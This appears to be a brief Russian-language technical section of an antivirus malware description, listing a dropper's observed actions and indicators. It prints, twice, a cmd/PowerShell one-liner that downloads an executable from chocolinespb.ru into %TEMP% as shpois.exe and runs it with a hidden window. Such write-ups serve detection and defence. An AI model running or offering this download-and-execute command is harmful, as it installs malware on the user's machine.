Техническая информация
- http://chocolinespb.ru/index.php как %temp%\shpois.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell(New-Object System.Net.WebClient).DownloadFile('http://chocolinespb.ru/index.php','%TEMP%\shpois.exe');Start-Process '%TEMP%\shpois.exe';
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1964
- %TEMP%\964897.cvr
- DNS ASK ch###linespb.ru
- '<SYSTEM32>\cmd.exe' /c PowerShell(New-Object System.Net.WebClient).DownloadFile('http://chocolinespb.ru/index.php','%TEMP%\shpois.exe');Start-Process '%TEMP%\shpois.exe';' (со скрытым окном)